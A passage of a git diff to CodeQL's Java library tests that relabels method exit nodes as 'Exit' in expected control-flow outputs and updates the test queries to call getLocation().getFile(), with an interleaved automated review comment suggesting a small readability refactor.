@@ -43,15 +43,15 @@ | Test.java:16:7:16:22 | sink(...) | Test.java:17:7:17:27 | ; | | Test.java:16:7:16:23 | ; | Test.java:16:12:16:21 | notTainted | | Test.java:16:12:16:21 | notTainted | Test.java:16:7:16:22 | sink(...) | -| Test.java:17:7:17:26 | sink(...) | Test.java:3:22:3:25 | test | +| Test.java:17:7:17:26 | sink(...) | Test.java:3:22:3:25 | Exit | | Test.java:17:7:17:27 | ; | Test.java:17:12:17:25 | alsoNotTainted | | Test.java:17:12:17:25 | alsoNotTainted | Test.java:17:7:17:26 | sink(...) | | Test.java:22:33:22:53 | { ... } | Test.java:22:42:22:50 | "tainted" | -| Test.java:22:35:22:51 | return ... | Test.java:22:24:22:29 | source | +| Test.java:22:35:22:51 | return ... | Test.java:22:24:22:29 | Exit | | Test.java:22:42:22:50 | "tainted" | Test.java:22:35:22:51 | return ... | -| Test.java:23:40:23:42 | { ... } | Test.java:23:22:23:25 | sink | +| Test.java:23:40:23:42 | { ... } | Test.java:23:22:23:25 | Exit | | Test.java:27:8:27:12 | ...=... | Test.java:27:8:27:12 | ; | -| Test.java:27:8:27:12 | ...=... | Test.java:27:8:27:12 | Outer | +| Test.java:27:8:27:12 | ...=... | Test.java:27:8:27:12 | Exit | | Test.java:27:8:27:12 | ; | Test.java:27:8:27:12 | this | | Test.java:27:8:27:12 | ; | Test.java:27:8:27:12 | this | | Test.java:27:8:27:12 | i | Test.java:27:8:27:12 | ...=... | @@ -61,7 +61,7 @@ | Test.java:27:8:27:12 | this | Test.java:27:8:27:12 | otherField | | Test.java:27:8:27:12 | { ... } | Test.java:27:8:27:12 | super(...) | | Test.java:28:8:28:12 | ...=... | Test.java:28:8:28:12 | ; | -| Test.java:28:8:28:12 | ...=... | Test.java:28:8:28:12 | Inner | +| Test.java:28:8:28:12 | ...=... | Test.java:28:8:28:12 | Exit | | Test.java:28:8:28:12 | ; | Test.java:28:8:28:12 | this | | Test.java:28:8:28:12 | ; | Test.java:28:8:28:12 | this | | Test.java:28:8:28:12 | nonTaintedField | Test.java:28:8:28:12 | ...=... | 
diff --git a/java/ql/test/library-tests/pattern-instanceof/cfg.ql b/java/ql/test/library-tests/pattern-instanceof/cfg.ql index 0b07e8c4708..db2cc49bc0b 100644 --- a/java/ql/test/library-tests/pattern-instanceof/cfg.ql +++ b/java/ql/test/library-tests/pattern-instanceof/cfg.ql @@ -1,5 +1,5 @@ import java from ControlFlowNode cn -where cn.getFile().getBaseName() = "Test.java" +where cn.getLocation().getFile().getBaseName() = "Test.java" select cn, cn.getASuccessor() diff --git a/java/ql/test/library-tests/pattern-switch/cfg/test.expected b/java/ql/test/library-tests/pattern-switch/cfg/test.expected index a63aa788668..c29059faf33 100644 --- a/java/ql/test/library-tests/pattern-switch/cfg/test.expected +++ b/java/ql/test/library-tests/pattern-switch/cfg/test.expected @@ -1,6 +1,6 @@ -| Exhaustive.java:1:14:1:23 | super(...) | Exhaustive.java:1:14:1:23 | Exhaustive | +| Exhaustive.java:1:14:1:23 | super(...) | Exhaustive.java:1:14:1:23 | Exit | | Exhaustive.java:1:14:1:23 | { ... } | Exhaustive.java:1:14:1:23 | super(...) | -| Exhaustive.java:3:8:3:8 | super(...) | Exhaustive.java:3:8:3:8 | E | +| Exhaustive.java:3:8:3:8 | super(...) | Exhaustive.java:3:8:3:8 | Exit | | Exhaustive.java:3:8:3:8 | { ... } | Exhaustive.java:3:8:3:8 | super(...) | | Exhaustive.java:3:8:3:8 | { ... } | Exhaustive.java:3:12:3:12 | ; | | Exhaustive.java:3:12:3:12 | ...=... | Exhaustive.java:3:15:3:15 | ; | 
@@ -9,12 +9,12 @@ | Exhaustive.java:3:15:3:15 | ...=... | Exhaustive.java:3:18:3:18 | ; | | Exhaustive.java:3:15:3:15 | ; | Exhaustive.java:3:15:3:15 | new E(...) | | Exhaustive.java:3:15:3:15 | new E(...) | Exhaustive.java:3:15:3:15 | ...=... | -| Exhaustive.java:3:18:3:18 | ...=... | Exhaustive.java:3:8:3:8 | | +| Exhaustive.java:3:18:3:18 | ...=... | Exhaustive.java:3:8:3:8 | Exit | | Exhaustive.java:3:18:3:18 | ; | Exhaustive.java:3:18:3:18 | new E(...) | | Exhaustive.java:3:18:3:18 | new E(...) | Exhaustive.java:3:18:3:18 | ...=... | -| Exhaustive.java:5:15:5:15 | super(...) | Exhaustive.java:5:15:5:15 | X | +| Exhaustive.java:5:15:5:15 | super(...) | Exhaustive.java:5:15:5:15 | Exit | | Exhaustive.java:5:15:5:15 | { ... } | Exhaustive.java:5:15:5:15 | super(...) | -| Exhaustive.java:6:15:6:15 | super(...) | Exhaustive.java:6:15:6:15 | Y | +| Exhaustive.java:6:15:6:15 | super(...) | Exhaustive.java:6:15:6:15 | Exit | | Exhaustive.java:6:15:6:15 | { ... } | Exhaustive.java:6:15:6:15 | super(...) | | Exhaustive.java:8:47:35:3 | { ... } | Exhaustive.java:11:5:11:14 | switch (...) | | Exhaustive.java:11:5:11:14 | switch (...) | Exhaustive.java:11:13:11:13 | o | 
@@ -50,10 +50,10 @@ | Exhaustive.java:30:13:30:13 | i | Exhaustive.java:31:7:31:15 | case | | Exhaustive.java:31:7:31:15 | case | Exhaustive.java:31:14:31:14 | | | Exhaustive.java:31:7:31:15 | case | Exhaustive.java:32:7:32:15 | case | -| Exhaustive.java:31:14:31:14 | | Exhaustive.java:8:22:8:25 | test | +| Exhaustive.java:31:14:31:14 | | Exhaustive.java:8:22:8:25 | Exit | | Exhaustive.java:32:7:32:15 | case | Exhaustive.java:32:14:32:14 | | -| Exhaustive.java:32:14:32:14 | | Exhaustive.java:8:22:8:25 | test | -| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Test | +| Exhaustive.java:32:14:32:14 | | Exhaustive.java:8:22:8:25 | Exit | +| Test.java:1:14:1:17 | super(...) | Test.java:1:14:1:17 | Exit | | Test.java:1:14:1:17 | { ... } | Test.java:1:14:1:17 | super(...) | | Test.java:3:41:134:3 | { ... } | Test.java:5:6:5:19 | switch (...) | | Test.java:5:6:5:19 | switch (...) | Test.java:5:14:5:18 | thing | @@ -380,9 +380,9 @@ | Test.java:130:8:130:21 | case | Test.java:130:20:130:20 | | | Test.java:130:8:130:21 | case | Test.java:131:8:131:15 | default | | Test.java:130:20:130:20 | | Test.java:131:8:131:15 | default | -| Test.java:131:8:131:15 | default | Test.java:3:22:3:25 | test | +| Test.java:131:8:131:15 | default | Test.java:3:22:3:25 | Exit | | Test.java:138:8:138:8 | ...=... | Test.java:138:8:138:8 | ; | -| Test.java:138:8:138:8 | ...=... | Test.java:138:8:138:8 | A | +| Test.java:138:8:138:8 | ...=... | Test.java:138:8:138:8 | Exit | | Test.java:138:8:138:8 | ; | Test.java:138:8:138:8 | this | | Test.java:138:8:138:8 | ; | Test.java:138:8:138:8 | this | | Test.java:138:8:138:8 | b | Test.java:138:8:138:8 | ...=... | 
@@ -392,7 +392,7 @@ | Test.java:138:8:138:8 | this | Test.java:138:8:138:8 | field3 | | Test.java:138:8:138:8 | { ... } | Test.java:138:8:138:8 | super(...) | | Test.java:139:8:139:8 | ...=... | Test.java:139:8:139:8 | ; | -| Test.java:139:8:139:8 | ...=... | Test.java:139:8:139:8 | B | +| Test.java:139:8:139:8 | ...=... | Test.java:139:8:139:8 | Exit | | Test.java:139:8:139:8 | ; | Test.java:139:8:139:8 | this | | Test.java:139:8:139:8 | ; | Test.java:139:8:139:8 | this | | Test.java:139:8:139:8 | field1 | Test.java:139:8:139:8 | ...=... | diff --git a/java/ql/test/library-tests/pattern-switch/cfg/test.ql b/java/ql/test/library-tests/pattern-switch/cfg/test.ql index 4511277ee7d..7e0a85af822 100644 --- a/java/ql/test/library-tests/pattern-switch/cfg/test.ql +++ b/java/ql/test/library-tests/pattern-switch/cfg/test.ql @@ -1,5 +1,5 @@ import java from ControlFlowNode cn -where cn.getFile().getBaseName() = ["Test.java", "Exhaustive.java"] +where cn.getLocation().getFile().getBaseName() = ["Test.java", "Exhaustive.java"] select cn, cn.getASuccessor() diff --git a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected index 63af489090b..a6f3820334a 100644 --- a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.expected @@ -1,4 +1,4 @@ -| CloseReaderTest.java:8:14:8:28 | super(...) | CloseReaderTest.java:8:14:8:28 | CloseReaderTest | +| CloseReaderTest.java:8:14:8:28 | super(...) | CloseReaderTest.java:8:14:8:28 | Exit | | CloseReaderTest.java:8:14:8:28 | { ... } | CloseReaderTest.java:8:14:8:28 | super(...) | | CloseReaderTest.java:10:2:24:2 | { ... } | CloseReaderTest.java:12:3:13:42 | ; | | CloseReaderTest.java:12:3:12:12 | System.out | CloseReaderTest.java:12:20:12:40 | "Enter password for " | 
@@ -19,12 +19,12 @@ | CloseReaderTest.java:16:5:16:13 | System.in | CloseReaderTest.java:15:45:16:14 | new InputStreamReader(...) | | CloseReaderTest.java:17:3:23:3 | try ... | CloseReaderTest.java:18:3:20:3 | { ... } | | CloseReaderTest.java:18:3:20:3 | { ... } | CloseReaderTest.java:19:11:19:15 | stdin | -| CloseReaderTest.java:19:4:19:27 | return ... | CloseReaderTest.java:9:23:9:34 | readPassword | +| CloseReaderTest.java:19:4:19:27 | return ... | CloseReaderTest.java:9:23:9:34 | Exit | | CloseReaderTest.java:19:11:19:15 | stdin | CloseReaderTest.java:19:11:19:26 | readLine(...) | | CloseReaderTest.java:19:11:19:26 | readLine(...) | CloseReaderTest.java:19:4:19:27 | return ... | | CloseReaderTest.java:19:11:19:26 | readLine(...) | CloseReaderTest.java:20:5:20:26 | catch (...) | | CloseReaderTest.java:20:5:20:26 | catch (...) | CloseReaderTest.java:20:24:20:25 | ex | | CloseReaderTest.java:20:24:20:25 | ex | CloseReaderTest.java:21:3:23:3 | { ... } | | CloseReaderTest.java:21:3:23:3 | { ... } | CloseReaderTest.java:22:11:22:14 | null | -| CloseReaderTest.java:22:4:22:15 | return ... | CloseReaderTest.java:9:23:9:34 | readPassword | +| CloseReaderTest.java:22:4:22:15 | return ... | CloseReaderTest.java:9:23:9:34 | Exit | | CloseReaderTest.java:22:11:22:14 | null | CloseReaderTest.java:22:4:22:15 | return ... | diff --git a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/CloseReaderTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ 
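Review bot: The two file filters in CloseReaderTest/TestSucc.ql now both walk `n.getLocation().getFile()`, once for the extension and once for the stem. Binding the file once reads more clearly, assuming `File` is in scope through the query's import: `exists(File f | f = n.getLocation().getFile() | f.getExtension() = "java" and not f.getStem() = "PopulateRuntimeException")`. The query also gives no reason for excluding PopulateRuntimeException, so a one-line comment above that condition saying why would help the next reader. The identical change appears in the LoopVarReadTest, SaveFileTest and SchackTest copies of TestSucc.ql, and the same remark applies there. The `from` clause sits outside the hunk.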
diff --git a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected index 4598c7e0e32..dcf2dac3cca 100644 --- a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.expected @@ -1,4 +1,4 @@ -| LoopVarReadTest.java:3:14:3:28 | super(...) | LoopVarReadTest.java:3:14:3:28 | LoopVarReadTest | +| LoopVarReadTest.java:3:14:3:28 | super(...) | LoopVarReadTest.java:3:14:3:28 | Exit | | LoopVarReadTest.java:3:14:3:28 | { ... } | LoopVarReadTest.java:3:14:3:28 | super(...) | | LoopVarReadTest.java:5:2:15:2 | { ... } | LoopVarReadTest.java:6:3:6:12 | var ...; | | LoopVarReadTest.java:6:3:6:12 | var ...; | LoopVarReadTest.java:6:11:6:11 | 2 | @@ -23,6 +23,6 @@ | LoopVarReadTest.java:12:7:12:12 | q | LoopVarReadTest.java:14:3:14:28 | ; | | LoopVarReadTest.java:12:11:12:12 | 10 | LoopVarReadTest.java:12:7:12:12 | q | | LoopVarReadTest.java:14:3:14:12 | System.out | LoopVarReadTest.java:14:22:14:26 | "foo" | -| LoopVarReadTest.java:14:3:14:27 | println(...) | LoopVarReadTest.java:4:21:4:28 | testLoop | +| LoopVarReadTest.java:14:3:14:27 | println(...) | LoopVarReadTest.java:4:21:4:28 | Exit | | LoopVarReadTest.java:14:3:14:28 | ; | LoopVarReadTest.java:14:3:14:12 | System.out | | LoopVarReadTest.java:14:22:14:26 | "foo" | LoopVarReadTest.java:14:3:14:27 | println(...) | diff --git a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/LoopVarReadTest/TestSucc.ql 
@@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected index 2c6f433af5a..3c261f67ee1 100644 --- a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.expected @@ -1,4 +1,4 @@ -| SaveFileTest.java:11:14:11:25 | super(...) | SaveFileTest.java:11:14:11:25 | SaveFileTest | +| SaveFileTest.java:11:14:11:25 | super(...) | SaveFileTest.java:11:14:11:25 | Exit | | SaveFileTest.java:11:14:11:25 | { ... } | SaveFileTest.java:11:14:11:25 | super(...) | | SaveFileTest.java:15:2:55:2 | { ... } | SaveFileTest.java:17:3:17:25 | var ...; | | SaveFileTest.java:17:3:17:25 | var ...; | SaveFileTest.java:17:21:17:24 | path | 
@@ -95,9 +95,9 @@ | SaveFileTest.java:48:5:48:15 | flush(...) | SaveFileTest.java:50:6:50:30 | catch (...) | | SaveFileTest.java:48:5:48:16 | ; | SaveFileTest.java:48:5:48:7 | bos | | SaveFileTest.java:49:5:49:7 | bos | SaveFileTest.java:49:5:49:15 | close(...) | -| SaveFileTest.java:49:5:49:15 | close(...) | SaveFileTest.java:12:14:12:21 | saveFile | +| SaveFileTest.java:49:5:49:15 | close(...) | SaveFileTest.java:12:14:12:21 | Exit | | SaveFileTest.java:49:5:49:15 | close(...) | SaveFileTest.java:50:6:50:30 | catch (...) | | SaveFileTest.java:49:5:49:16 | ; | SaveFileTest.java:49:5:49:7 | bos | | SaveFileTest.java:50:6:50:30 | catch (...) | SaveFileTest.java:50:23:50:29 | ignored | | SaveFileTest.java:50:23:50:29 | ignored | SaveFileTest.java:51:4:52:4 | { ... } | -| SaveFileTest.java:51:4:52:4 | { ... } | SaveFileTest.java:12:14:12:21 | saveFile | +| SaveFileTest.java:51:4:52:4 | { ... } | SaveFileTest.java:12:14:12:21 | Exit | diff --git a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/SaveFileTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected b/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected index 9bbb912e6d9..c645abe3507 100644 --- a/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected +++ b/java/ql/test/library-tests/successors/SchackTest/TestSucc.expected 
@@ -1,8 +1,8 @@ -| SchackTest.java:1:14:1:23 | super(...) | SchackTest.java:1:14:1:23 | SchackTest | +| SchackTest.java:1:14:1:23 | super(...) | SchackTest.java:1:14:1:23 | Exit | | SchackTest.java:1:14:1:23 | { ... } | SchackTest.java:1:14:1:23 | super(...) | -| SchackTest.java:2:8:2:10 | super(...) | SchackTest.java:2:8:2:10 | ExA | +| SchackTest.java:2:8:2:10 | super(...) | SchackTest.java:2:8:2:10 | Exit | | SchackTest.java:2:8:2:10 | { ... } | SchackTest.java:2:8:2:10 | super(...) | -| SchackTest.java:3:8:3:10 | super(...) | SchackTest.java:3:8:3:10 | ExB | +| SchackTest.java:3:8:3:10 | super(...) | SchackTest.java:3:8:3:10 | Exit | | SchackTest.java:3:8:3:10 | { ... } | SchackTest.java:3:8:3:10 | super(...) | | SchackTest.java:5:18:24:2 | { ... } | SchackTest.java:6:3:23:3 | try ... | | SchackTest.java:6:3:23:3 | try ... | SchackTest.java:6:7:17:3 | { ... } | @@ -56,7 +56,7 @@ | SchackTest.java:20:23:20:72 | "successor (but neither true nor false successor)" | SchackTest.java:20:4:20:73 | println(...) | | SchackTest.java:21:13:23:3 | { ... } | SchackTest.java:22:4:22:41 | ; | | SchackTest.java:22:4:22:13 | System.out | SchackTest.java:22:23:22:39 | "false successor" | -| SchackTest.java:22:4:22:40 | println(...) | SchackTest.java:5:7:5:9 | foo | +| SchackTest.java:22:4:22:40 | println(...) | SchackTest.java:5:7:5:9 | Exit | | SchackTest.java:22:4:22:41 | ; | SchackTest.java:22:4:22:13 | System.out | | SchackTest.java:22:23:22:39 | "false successor" | SchackTest.java:22:4:22:40 | println(...) | | SchackTest.java:26:35:30:2 | { ... } | SchackTest.java:27:3:27:25 | if (...) | 
@@ -65,9 +65,9 @@ | SchackTest.java:27:7:27:24 | ... > ... | SchackTest.java:28:10:28:18 | new ExB(...) | | SchackTest.java:27:7:27:24 | ... > ... | SchackTest.java:29:10:29:22 | random(...) | | SchackTest.java:27:23:27:24 | .5 | SchackTest.java:27:7:27:24 | ... > ... | -| SchackTest.java:28:4:28:19 | throw ... | SchackTest.java:26:18:26:20 | bar | +| SchackTest.java:28:4:28:19 | throw ... | SchackTest.java:26:18:26:20 | Exit | | SchackTest.java:28:10:28:18 | new ExB(...) | SchackTest.java:28:4:28:19 | throw ... | -| SchackTest.java:29:3:29:28 | return ... | SchackTest.java:26:18:26:20 | bar | +| SchackTest.java:29:3:29:28 | return ... | SchackTest.java:26:18:26:20 | Exit | | SchackTest.java:29:10:29:22 | random(...) | SchackTest.java:29:26:29:27 | .3 | | SchackTest.java:29:10:29:27 | ... > ... | SchackTest.java:29:3:29:28 | return ... | | SchackTest.java:29:26:29:27 | .3 | SchackTest.java:29:10:29:27 | ... > ... | diff --git a/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql b/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql index 9de77b3c42b..6fca436fbfd 100644 --- a/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql +++ b/java/ql/test/library-tests/successors/SchackTest/TestSucc.ql @@ -4,5 +4,5 @@ from ControlFlowNode n, ControlFlowNode succ where succ = n.getASuccessor() and n.getLocation().getFile().getExtension() = "java" and - not n.getFile().getStem() = "PopulateRuntimeException" + not n.getLocation().getFile().getStem() = "PopulateRuntimeException" select n, succ diff --git a/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected b/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected index e871d474a81..8dac71ffd45 100644 --- a/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected +++ b/java/ql/test/library-tests/successors/TestBreak/TestSucc.expected 
@@ -1,4 +1,4 @@ -| TestBreak.java:3:14:3:22 | super(...) | TestBreak.java:3:14:3:22 | TestBreak | +| TestBreak.java:3:14:3:22 | super(...) | TestBreak.java:3:14:3:22 | Exit | | TestBreak.java:3:14:3:22 | { ... } | TestBreak.java:3:14:3:22 | super(...) | | TestBreak.java:5:2:85:2 | { ... } | TestBreak.java:7:3:8:11 |